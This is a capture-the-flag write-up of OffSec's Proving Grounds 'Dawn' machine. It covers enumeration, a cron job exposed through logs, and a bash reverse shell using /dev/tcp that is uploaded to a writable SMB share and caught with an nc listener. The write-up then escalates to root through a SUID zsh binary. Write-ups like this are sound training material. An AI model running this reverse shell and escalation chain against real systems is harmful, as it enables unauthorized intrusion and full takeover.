Proving Grounds - Dawn Writeup

May 31, 2026

ctf
linux

This lab demonstrates the exploitation of a misconfigured SMB share and scheduled cron jobs to achieve remote code execution. By uploading malicious files to an open SMB share, the attacker leverages a cron job to execute them. Privilege escalation is accomplished through a misconfigured SUID binary, zsh, which provides root access.

This is a walkthrough of the machine Dawn from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Intermediate
  • Flags: 2
  • OS: Linux
  • Vector: Samba, SUID misconfiguration

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 80 - HTTP
  • 139/445 - Samba
  • 3306 - MySQL

Webapp

The web application on port 80 does not reveal anything interesting, displaying a generic "under construction" page:

To dig deeper, we will enumerate it using gobuster:

gobuster dir -u http://<IP>/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 64

We get a hit on /logs, which is an open directory containing four log files.

The only accessible log file is management.log, so we can download it to take a closer look.

wget http://<IP>/logs/management.log

The file contains logs from pspy - a process monitoring tool. Scrolling down a bit, we discover what appears to be a cronjob executing the following commands every minute:

Samba

We will briefly take a detour to enumerate Samba, first listing what shares are available using smbclient:

smbclient -L \\\\<IP>\\

We can see the same share - ITDEPT, which the cronjob executes product-control and web-control from.

Initial access

Since the cronjob will execute these files, and we have access to the share, we will start off by creating a simple reverse shell.

web-control:

#!/bin/bash
bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

Next, we will start a listener to catch the shell:

nc -lvnp <PORT>

And finally, we will connect to the ITDEPT share, and upload web-control:

smbclient \\\\<IP>\\ITDEPT

put web-control

Within a minute, we receive a shell as www-data, and can read the first local.txt flag:

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/zsh:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running the following, which provides us with a root shell to finally read the second proof.txt flag:

zsh

Related Articles
Hack The Box - Jerry Writeup
June 15, 2026
ctf
windows
An easy-rated Windows box involving default credentials for initial access into Apache Tomcat, and creating an application with a JSP webshell to obtain code execution as SYSTEM.
Hack The Box - Administrator Writeup
June 13, 2026
ctf
windows
active directory
A medium-rated active directory box which involves chaining rights abuses to compromise users, gain access to FTP to discover a Password Safe file and execute a targeted Kerberoast and DCSync attack to compromise the domain.
Hack The Box - Return Writeup
June 13, 2026
ctf
windows
active directory
An easy-rated active directory box involving LDAP and plaintext credentials for initial access, and abusing services to run a malicious image and obtain a SYSTEM shell.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.